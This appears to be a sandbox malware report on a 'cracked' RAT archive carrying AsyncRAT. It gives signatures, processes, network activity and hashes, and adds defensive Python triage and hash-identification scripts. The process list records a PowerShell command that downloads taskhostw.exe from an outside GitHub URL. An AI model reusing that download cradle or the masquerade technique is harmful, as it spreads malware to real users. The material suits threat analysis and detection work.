| SHA256 | c84c98bbf5e0ef9c8d0708b5d60c5bb656b7d6be5135d7f7a8d25557e08cf142 |
| SHA512 | d1f7eed00959e902bdb2125b91721460d3ff99f3bdfc1f2a343d4f58e8d4e5e5a06c0c6cdc0379211c94510f7c00d7a8b34fa7d0ca0c3d54cbbe878f1e9812b7 |
memory/2028-1517-0x000000001C350000-0x000000001C3D0000-memory.dmp
memory/2028-1518-0x000000001C350000-0x000000001C3D0000-memory.dmp
memory/2028-1506-0x000000001C350000-0x000000001C3D0000-memory.dmp
memory/1360-1569-0x0000000002020000-0x0000000002060000-memory.dmp
memory/2192-1573-0x000000001BD90000-0x000000001BE10000-memory.dmp
memory/2028-1574-0x000000001C350000-0x000000001C3D0000-memory.dmp
memory/2192-1575-0x000000001BD90000-0x000000001BE10000-memory.dmp
memory/2028-1576-0x000000001C350000-0x000000001C3D0000-memory.dmp
memory/1360-1577-0x0000000002020000-0x0000000002060000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Cab3AD8.tmp
| MD5 | ac05d27423a85adc1622c714f2cb6184 |
| SHA1 | b0fe2b1abddb97837ea0195be70ab2ff14d43198 |
| SHA256 | c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d |
| SHA512 | 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | 753df6889fd7410a2e9fe333da83a429 |
| SHA1 | 3c425f16e8267186061dd48ac1c77c122962456e |
| SHA256 | b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78 |
| SHA512 | 9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444 |
C:\Users\Admin\AppData\Local\Temp\Tar3DAC.tmp
| MD5 | dd73cead4b93366cf3465c8cd32e2796 |
| SHA1 | 74546226dfe9ceb8184651e920d1dbfb432b314e |
| SHA256 | a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22 |
| SHA512 | ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63 |
C:\Users\Admin\AppData\Local\d4578ee47ee76e337547c667d2e9866d\msgid.dat
| MD5 | cfcd208495d565ef66e7dff9f98764da |
| SHA1 | b6589fc6ab0dc82cf12099d1c2d40ab994e8410c |
| SHA256 | 5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9 |
| SHA512 | 31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99 |
memory/2192-1676-0x000007FEF5940000-0x000007FEF632C000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-03-20 17:22
Reported
2024-03-20 17:47
Platform
win10-20240221-en
Max time kernel
1310s
Max time network
1217s
Command Line
Signatures
AsyncRat
Contains code to disable Windows Defender
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\Stub.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe | N/A |
Obfuscated with Agile.Net obfuscator
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000\Software\Microsoft\Internet Explorer\TypedURLs | C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings | C:\Program Files\7-Zip\7zFM.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeRestorePrivilege | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: 35 (SeCreateSymbolicLinkPrivilege; the sandbox shows the raw privilege LUID) | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\S500 RAT Cracked + Source .rar"
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\S500 RAT Cracked + Source .rar"
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\S500 RAT Cracked\Readme.txt
C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe
"C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\CCA6.tmp\CCA7.tmp\CCA8.bat "C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe""
C:\Windows\system32\chcp.com
chcp 65001
C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe
ServerRegistrationManager.exe
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\Resources\stub.txt
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Invoke-WebRequest 'https://github.com/CVE-TEAMDSNH-20230611/20230611VNM/raw/main/taskhostw.exe' -OutFile taskhostw.exe"
C:\Windows\system32\taskhostw.exe
taskhostw.exe
C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe
"C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\D2CD.tmp\D2CE.tmp\D2CF.bat "C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe""
C:\Windows\system32\chcp.com
chcp 65001
C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe
ServerRegistrationManager.exe
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\7zO831A2C0C\Stub.txt
C:\Users\Admin\Desktop\Stub.exe
"C:\Users\Admin\Desktop\Stub.exe"
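The process list above is flat (image path, then command line, with no parent-child links), so the chain that matters has to be read out of it by hand: S500RAT.exe is followed by `sysnative\cmd.exe /c` on a `Temp\XXXX.tmp\YYYY.tmp\ZZZZ.bat` script, then by `chcp 65001` and ServerRegistrationManager.exe, and a PowerShell `Invoke-WebRequest ... -OutFile taskhostw.exe` is followed by a process named taskhostw.exe. The following script is an added example for this page, not code from the report or from the sample; it parses those image/command-line pairs (copied from the list above) and applies three checks: a PowerShell download-to-disk cradle, a later process whose image name equals the file that cradle fetched, and the nested `.tmp\.tmp\.bat` layout, which I read as the extraction pattern of batch-to-exe wrappers (my identification, not a statement the report makes). The `SYSTEM_BINARY_NAMES` list is a hypothetical short allowlist of Windows binary names that droppers borrow; correlation is by list order only, because the report gives no parent PIDs.

```python
import re
from dataclasses import dataclass
from pathlib import PureWindowsPath

# Image path / command line pairs copied from the behavioral2 Processes section
# of this report (the report lists them flat, without parent-child links).
PROCESSES_RAW = r"""
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\S500 RAT Cracked + Source .rar"
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\S500 RAT Cracked + Source .rar"
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\S500 RAT Cracked\Readme.txt
C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe
"C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\CCA6.tmp\CCA7.tmp\CCA8.bat "C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe""
C:\Windows\system32\chcp.com
chcp 65001
C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe
ServerRegistrationManager.exe
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\Resources\stub.txt
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Invoke-WebRequest 'https://github.com/CVE-TEAMDSNH-20230611/20230611VNM/raw/main/taskhostw.exe' -OutFile taskhostw.exe"
C:\Windows\system32\taskhostw.exe
taskhostw.exe
C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe
"C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\D2CD.tmp\D2CE.tmp\D2CF.bat "C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe""
C:\Windows\system32\chcp.com
chcp 65001
C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe
ServerRegistrationManager.exe
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\7zO831A2C0C\Stub.txt
C:\Users\Admin\Desktop\Stub.exe
"C:\Users\Admin\Desktop\Stub.exe"
"""

# PowerShell download-to-disk cradle: Invoke-WebRequest or its iwr/wget/curl aliases with -OutFile.
DOWNLOAD_RE = re.compile(
    r"(?:Invoke-WebRequest|iwr|wget|curl)\b.*?-OutFile\s+['\"]?([^\s'\"]+)", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s'\"]+", re.IGNORECASE)
# Temp\XXXX.tmp\XXXX.tmp\XXXX.bat run through cmd.exe: the extraction layout of
# batch-to-exe wrappers (assumption of this example, not a claim made by the report).
BAT2EXE_RE = re.compile(
    r"\\Temp\\[0-9A-F]{4}\.tmp\\[0-9A-F]{4}\.tmp\\[0-9A-F]{4}\.bat", re.IGNORECASE)
# Hypothetical short list of legitimate Windows binary names that droppers borrow.
SYSTEM_BINARY_NAMES = {"taskhostw.exe", "svchost.exe", "conhost.exe", "explorer.exe", "csrss.exe"}


@dataclass(frozen=True)
class Finding:
    index: int   # position of the process in the report's list
    rule: str
    detail: str


def parse_process_list(text: str) -> list:
    """Turn the report's alternating image/command-line lines into (image, cmdline) pairs."""
    lines = [line for line in text.splitlines() if line.strip()]
    if len(lines) % 2:
        raise ValueError("expected image path / command line pairs")
    return list(zip(lines[0::2], lines[1::2]))


def triage(processes: list) -> list:
    findings = []
    downloaded = {}  # lower-case file name -> index of the process that fetched it
    for i, (image, cmdline) in enumerate(processes):
        image_name = PureWindowsPath(image).name.lower()
        m = DOWNLOAD_RE.search(cmdline)
        if m:
            out_name = PureWindowsPath(m.group(1)).name.lower()
            url = URL_RE.search(cmdline)
            findings.append(Finding(i, "powershell-download-cradle",
                                    f"{out_name} <- {url.group(0) if url else 'unknown url'}"))
            if out_name in SYSTEM_BINARY_NAMES:
                findings.append(Finding(i, "system-binary-name-masquerade", out_name))
            downloaded[out_name] = i
        if BAT2EXE_RE.search(cmdline):
            findings.append(Finding(i, "bat-to-exe-wrapper", cmdline))
        # A process whose image name equals something fetched earlier in the list.
        if image_name in downloaded and downloaded[image_name] < i:
            findings.append(Finding(i, "downloaded-binary-executed", image))
    return findings


if __name__ == "__main__":
    for f in triage(parse_process_list(PROCESSES_RAW)):
        print(f"[{f.index:2}] {f.rule}: {f.detail}")
```

Run against the list above it reports the two batch wrappers spawned by S500RAT.exe, the GitHub download of taskhostw.exe, the borrowed system-binary name, and the later taskhostw.exe process. Note that the report's Files section records no dropped taskhostw.exe, so whether the executed image was the downloaded file or the genuine System32 binary cannot be settled from this page alone.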
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 7.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 45.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| DE | 140.82.121.4:443 | github.com | tcp |
| US | 8.8.8.8:53 | github.githubassets.com | udp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 8.8.8.8:53 | 4.121.82.140.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 129.134.221.88.in-addr.arpa | udp |
Files
C:\Users\Admin\Desktop\S500 RAT Cracked\Readme.txt
| MD5 | 531208ea558a68c95339bea9517845c3 |
| SHA1 | 95865bbeb196cf007626c92cdef1524c9b16dc5a |
| SHA256 | dbceb36fa695bfe2bd706b22cb690976a3df77a46ec97d9188a3875308044b3a |
| SHA512 | 46f04b05cd14d80bef69325802464d190856af9f2844312f84263baf00eb14d3ca58d647fed8fcc5de0106883ec3f2546fed8b58ca09464fd6a336e7dece66f3 |
C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe
| MD5 | 5b52658c4517684971de10a6b7a67c30 |
| SHA1 | f0820c52617ebacaf53d8b8d97f1a42c712888bd |
| SHA256 | 3ec85206a8c5d584c2cf4ab575bdd5cf4b29ed3a896032a1adc37f1c08507b31 |
| SHA512 | ce96d25cfbb0d2c4addf242aa05c05909d7a883a70881df8336498b16913ec21bd64c07519eba89b2da90a05902fd7618e172a7602b985153eac09d9f226c8d6 |
memory/1800-233-0x0000000000400000-0x0000000000439000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\CCA6.tmp\CCA7.tmp\CCA8.bat
| MD5 | fc4af7384f0b6f274dd3e745f0aceeaa |
| SHA1 | 31b310f869b15b84e52ef282cabaee974e5043cf |
| SHA256 | f27a781bd4e8788990ceecac17ba4b9642e15f0d311e17d62c70db694c207a34 |
| SHA512 | dc7b542d89236105c8b8976e5af0e9e557eaa919adb2e8384b55b70c0b5bc6f00d2010538b9abaca90bb797d24fd509acdc1b3a6beea27f11405bf198349f57f |
C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe
| MD5 | aa2fc72b58059e5e7e9e7003ab466322 |
| SHA1 | e171576589134431baccb40d308e7dcbc776e087 |
| SHA256 | f107c0f275bd1c773e1ff2d78b60a4060b8353b02f45d3892968206fedffdf88 |
| SHA512 | 26d69ad0d3f41bf08585307595e1d670c7d7905e1f86a566a36d9b0c836d3b349a6349e1f2885d433d35bd111f95ce004ae34e81443f96b73e784db3594e3eef |
memory/1512-239-0x00007FFC5D1F0000-0x00007FFC5DBDC000-memory.dmp
memory/1512-240-0x000001E280000000-0x000001E2810C4000-memory.dmp
memory/1512-241-0x000001E29B0C0000-0x000001E29B0D0000-memory.dmp
C:\Users\Admin\Desktop\S500 RAT Cracked\Guna.UI2.dll
| MD5 | 0f07705bd42d86d77dab085c42775244 |
| SHA1 | 7e4b5c367183f4753a8d610e353c458c3def3888 |
| SHA256 | cf9b66e11506fa431849350c0cb58430a71e5ec943d2db9ef1b2e2302f299443 |
| SHA512 | 851b1a4c470ee7fe07ce5619c16fd391428585926c5b559694a9e445633ea51ec86c74a3bbf3bce39d943c4bf714dad2fd3c4a4d0703be2333541c79a2ee97f0 |
memory/1512-243-0x000001E29B2D0000-0x000001E29B4C2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\c6ef4c2b-9a55-40b4-957b-c3cb74191397\GunaDotNetRT64.dll
| MD5 | 9c43f77cb7cff27cb47ed67babe3eda5 |
| SHA1 | b0400cf68249369d21de86bd26bb84ccffd47c43 |
| SHA256 | f25b9288fe370dcfcb4823fb4e44ab88c7f5fce6e137d0dba389a3dba07d621e |
| SHA512 | cde6fb6cf8db6f9746e69e6c10214e60b3646700d70b49668a2a792e309714dd2d4c5a5241977a833a95fcde8318abcc89eb9968a5039a0b75726bbfa27125a7 |
memory/1512-252-0x00007FFC4BDB0000-0x00007FFC4BEDC000-memory.dmp
memory/1512-251-0x00007FFC5EF50000-0x00007FFC5EF77000-memory.dmp
C:\Users\Admin\Desktop\S500 RAT Cracked\SunnyUI.dll
| MD5 | af527b22b92a23c38a492c5961cf2643 |
| SHA1 | 15106adfa13415287b3e9d8deba21df53cb92eda |
| SHA256 | 4208c9293c5684d2fc3c8f5a269a1120adee32fbd2766bbb73410aab2d491b7a |
| SHA512 | 543cce9b5e4c9558bf0bd0da9d6af8c1ad2f7d62e2d65a9aa4e3af9e4840ce6fb6bbe8952bd20f6f1e3a6d3b5e5e5b3417a60b6d955bfa4e23a653262677b49c |
memory/1512-254-0x000001E29B910000-0x000001E29BB50000-memory.dmp
memory/1512-255-0x000001E29B0C0000-0x000001E29B0D0000-memory.dmp
memory/1512-256-0x000001E29B0C0000-0x000001E29B0D0000-memory.dmp
memory/1512-257-0x000001E29B0C0000-0x000001E29B0D0000-memory.dmp
memory/1512-258-0x000001E29B0C0000-0x000001E29B0D0000-memory.dmp
memory/1512-259-0x000001E29B0C0000-0x000001E29B0D0000-memory.dmp
memory/1512-260-0x000001E29B8D0000-0x000001E29B902000-memory.dmp
memory/1512-261-0x000001E29B0C0000-0x000001E29B0D0000-memory.dmp
memory/1800-262-0x0000000000400000-0x0000000000439000-memory.dmp
memory/1512-263-0x00007FFC5D1F0000-0x00007FFC5DBDC000-memory.dmp
memory/1512-264-0x000001E29B0C0000-0x000001E29B0D0000-memory.dmp
C:\Users\Admin\Desktop\S500 RAT Cracked\initialization.dll
| MD5 | 3aaae3cec15b86693ae9fb8e1507c872 |
| SHA1 | ed8d0a139c609eb886482718ec2ecf96cbbe8c84 |
| SHA256 | a027b6b344e5a637bc8377fe58166273d2b76e92ff8c66bd505d46c21fe3b21b |
| SHA512 | 407558e01ade1832bb021b5af0209e7a6bef98ab35b9f4723a1add48362bd13f566697a8fb41af48c0bb15ca13585f9c09ac8d5da0feb322798c778b09cf4463 |
memory/1512-266-0x000001E2A1F90000-0x000001E2A1F9C000-memory.dmp
memory/1512-267-0x000001E2A1FC0000-0x000001E2A1FD2000-memory.dmp
memory/1512-268-0x000001E2A1CA0000-0x000001E2A1CAA000-memory.dmp
C:\Users\Admin\Desktop\S500 RAT Cracked\Certificate\ServerCertificate.p12
| MD5 | c60e527a85f285ddc66c2fcf160b1be7 |
| SHA1 | abcf2b6bffea9f0f30190783f6eae2434ef7a9a8 |
| SHA256 | 35c46a9e9dc60a74a25572e743794a31fecd08672813d349a39f2d13b01e789f |
| SHA512 | 77a661544c2d7f2d8b870cdd503b806aea6de3a2b5aee19327c05aeef137a1df3661d249219fe73e7a300189c732efeb5d2004226c6e429fa024f1d3b1dec84e |
C:\Users\Admin\Desktop\S500 RAT Cracked\SunnyUI.Common.dll
| MD5 | 17cbdd9e4cb0ede2fad8c08c05fdaa84 |
| SHA1 | 74bc0ea3e8bd64c6752b6c0adac1bfe2b313416c |
| SHA256 | d975bc4711655e6fd2361ae9b056c617051f616ced5b46ce7772255a85712441 |
| SHA512 | 1948c20585ecb9984cd9452a74bcb75e81c35ca37f0cf0e1d3f211ad71b9e40c215f4784af7803cec9baef9984f682a32817a85806aefad21830b13b6a0a6a4a |
memory/1512-273-0x000001E2A1D00000-0x000001E2A1D3C000-memory.dmp
memory/1512-274-0x000001E29B0C0000-0x000001E29B0D0000-memory.dmp
memory/1512-275-0x00007FFC5EF50000-0x00007FFC5EF77000-memory.dmp
memory/1512-276-0x000001E29B0C0000-0x000001E29B0D0000-memory.dmp
memory/1512-277-0x000001E29B0C0000-0x000001E29B0D0000-memory.dmp
memory/1512-278-0x000001E29B0C0000-0x000001E29B0D0000-memory.dmp
memory/1512-280-0x000001E29B0C0000-0x000001E29B0D0000-memory.dmp
memory/1512-281-0x000001E29B0C0000-0x000001E29B0D0000-memory.dmp
memory/1512-282-0x000001E29B0C0000-0x000001E29B0D0000-memory.dmp
memory/1512-283-0x000001E29B0C0000-0x000001E29B0D0000-memory.dmp
memory/1512-287-0x000001E2A1D40000-0x000001E2A1E40000-memory.dmp
memory/1512-289-0x000001E2A1D40000-0x000001E2A1E40000-memory.dmp
memory/1512-290-0x000001E2A1D40000-0x000001E2A1E40000-memory.dmp
memory/1512-291-0x000001E2A1D40000-0x000001E2A1E40000-memory.dmp
C:\Users\Admin\Desktop\Resources\stub.txt
| MD5 | 3fc302b81fdf520e4d3a170fe3ed0f0d |
| SHA1 | 9d821cc04064add1192decb54c76fdc9c4ef5747 |
| SHA256 | da3ab74adcfac4c84c23b564d7923beb706f62eb279cc6d945ac163721457f32 |
| SHA512 | b71077bb6703454c437cfdba4be2e9b86dfc9e3bb63ac89eeb9be0746c4f0b6b9d4bd16f7d44da9df89ab543420320dcd521115ea776c77fe32825836a86a552 |
memory/1512-370-0x00007FFC5D1F0000-0x00007FFC5DBDC000-memory.dmp
memory/3136-372-0x00007FFC5D1F0000-0x00007FFC5DBDC000-memory.dmp
memory/3136-377-0x0000022916090000-0x00000229160A0000-memory.dmp
memory/3136-376-0x0000022916090000-0x00000229160A0000-memory.dmp
memory/3136-378-0x0000022916060000-0x0000022916082000-memory.dmp
memory/3136-381-0x000002292E4F0000-0x000002292E566000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1k21x3pv.pbi.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
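Two files in this report, `msgid.dat` under the stealer's `d4578ee47ee76e337547c667d2e9866d` directory (listed in the static1 analysis above) and the `__PSScriptPolicyTest_1k21x3pv.pbi.ps1` entry just listed, carry hash sets that a practitioner should recognise before spending time on them: they are the digests of the single characters `0` and `1`. The `__PSScriptPolicyTest_*.ps1` file is PowerShell's own application-control probe, not something the sample wrote. The following script is an added example for this page, not code from the report or the sample; it takes hash sets copied from the Files sections, hashes a constructed list of candidate placeholder contents, and names the file's content when every listed digest matches. `Readme.txt` from the Files section is included as a control that must not match.

```python
import hashlib

# Hash sets copied from the Files sections of this report.
REPORT_FILES = {
    r"C:\Users\Admin\AppData\Local\d4578ee47ee76e337547c667d2e9866d\msgid.dat": {
        "md5": "cfcd208495d565ef66e7dff9f98764da",
        "sha1": "b6589fc6ab0dc82cf12099d1c2d40ab994e8410c",
        "sha256": "5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9",
    },
    r"C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1k21x3pv.pbi.ps1": {
        "md5": "c4ca4238a0b923820dcc509a6f75849b",
        "sha1": "356a192b7913b04c54574d18c28d46e6395428ab",
        "sha256": "6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b",
    },
    # Control entry: a real text file from the same report that should not match any candidate.
    r"C:\Users\Admin\Desktop\S500 RAT Cracked\Readme.txt": {
        "md5": "531208ea558a68c95339bea9517845c3",
        "sha1": "95865bbeb196cf007626c92cdef1524c9b16dc5a",
        "sha256": "dbceb36fa695bfe2bd706b22cb690976a3df77a46ec97d9188a3875308044b3a",
    },
}

# Constructed list of typical placeholder / flag-file contents; extend as needed.
CANDIDATES = [b"", b"0", b"1", b"0\n", b"1\n", b"0\r\n", b"1\r\n", b"true", b"false"]


def digests(data: bytes) -> dict:
    """MD5/SHA1/SHA256 of a byte string, keyed the way sandbox reports label them."""
    return {
        "md5": hashlib.md5(data).hexdigest(),
        "sha1": hashlib.sha1(data).hexdigest(),
        "sha256": hashlib.sha256(data).hexdigest(),
    }


def identify_placeholder(hashes: dict, candidates=CANDIDATES):
    """Return the candidate content whose digests all equal the report's, or None."""
    wanted = {k: v.lower() for k, v in hashes.items() if k in ("md5", "sha1", "sha256")}
    if not wanted:
        return None
    for content in candidates:
        actual = digests(content)
        if all(actual[k] == v for k, v in wanted.items()):
            return content
    return None


def classify_report_files(files=REPORT_FILES) -> dict:
    """Map each reported path to its recovered content (bytes) or None."""
    return {path: identify_placeholder(h) for path, h in files.items()}


if __name__ == "__main__":
    for path, content in classify_report_files().items():
        print(f"{path}\n    -> {content!r}")
```

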